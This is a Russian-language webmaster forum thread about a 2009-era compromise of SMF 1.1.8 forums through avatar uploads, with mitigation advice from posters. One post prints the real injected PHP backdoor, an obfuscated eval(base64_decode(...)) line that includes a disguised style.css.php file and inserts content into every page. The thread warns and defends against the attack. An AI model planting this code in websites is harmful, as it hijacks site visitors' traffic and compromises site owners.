Владельцам SMF — внимание

12 3
V@der
На сайте с 22.11.2007
Offline
96
3788

Сегодня пытался поставить антиспам для SMF 1.1.8 и случайно обнаружил, что в служебные файлы форума инжектирован PHP-код.

Оказалось, что все файлы форума заражены.

Англоязычный форум SMF уже переполнен сообщениями о взломах.

Ветки (англ. язык):

http://www.simplemachines.org/community/index.php?topic=309717.0

http://www.simplemachines.org/community/index.php?topic=307717.0

На текущий момент опасности могут быть подвергнуты любые версии форума.

Отличительным признаком заражения является наличие на форуме пользователя "krisbarteo", он как раз и инжектирует вредоносный код через аватарку.

Для защиты рекомендуют:

1. Отключить загрузку аватар, будь то удалённый URL или файл с компьютера. Отключить вложения.

2. Регулярное обновление ПО сервера.

3. Инсталляция анти-спам модулей.

Wind change
На сайте с 12.02.2007
Offline
88
#2

Тоже нашел у себя этого пользователя. Но радует что был без аватарки. В каких файлах проверить есть ли инжект или нет?

Тут можно хорошо заработать. Помогаю рефералам (http://www.sape.ru/r.cb6c8f75d4.php)
[Удален]
#3

Вот вам и free )) думаю щас 99% откажутся от smf )

V@der
На сайте с 22.11.2007
Offline
96
#4

Wind change, в большинстве файлов из папки Source есть инжект, например, в subs.php

По крайней мере, у меня.

[Удален]
#5

оффтоп

не удивлюсь если этот крис один программеров который разрабатывал софт, но по каким-то причинам пнутый под зад коленом...

по сабжу - интересно, сколько понадобится времени восстановить репутацию движка??

[Удален]
#6

Мехалоч, как когда то phpbb упал в моих глазах ))) но опять же вина в первую очередь вебмастера )) никогда не доверял и не доверяю сторонним продуктам.

юрии22
На сайте с 03.12.2007
Offline
141
#7

а есть какие то визуальные признаки ? пользователя такого нашел , был без аватарки , удалил его . форум функционирует нормально! очень хочется знать точно - есть ли инфекация!?

V@der
На сайте с 22.11.2007
Offline
96
#8

Визуально ничего не заметно. Насколько я понимаю, форум будет использоваться для слива траффика.

Про то, как обнаружить, написал выше — в начале файлов форума, в частности из папки Source, должен быть инжектирован PHP-код функцией eval().


<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9hZG1pbi9kb21haW5zL3d3d29tZW4uY29tLnVhL3B1YmxpY19odG1sL2ZvcnVtL1RoZW1lcy9kZWZhdWx0L2xhbmd1YWdlcy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvYWRtaW4vZG9tYWlucy93d3dvbWVuLmNvbS51YS9wdWJsaWNfaHRtbC9mb3J1bS9UaGVtZXMvZGVmYXVsdC9sYW5ndWFnZXMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

был без аватарки

У него и не должна она быть...

zhidronsss
На сайте с 12.10.2007
Offline
36
#9

V@der, инклюдят что то из wwwomen.com.ua/public_html/forum/Themes/default/languages/style.css.php

A
На сайте с 12.05.2004
Offline
176
#10

Проснулись. Уязвимость юзают уже больше месяца. Многие форумы вообще закрыты.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий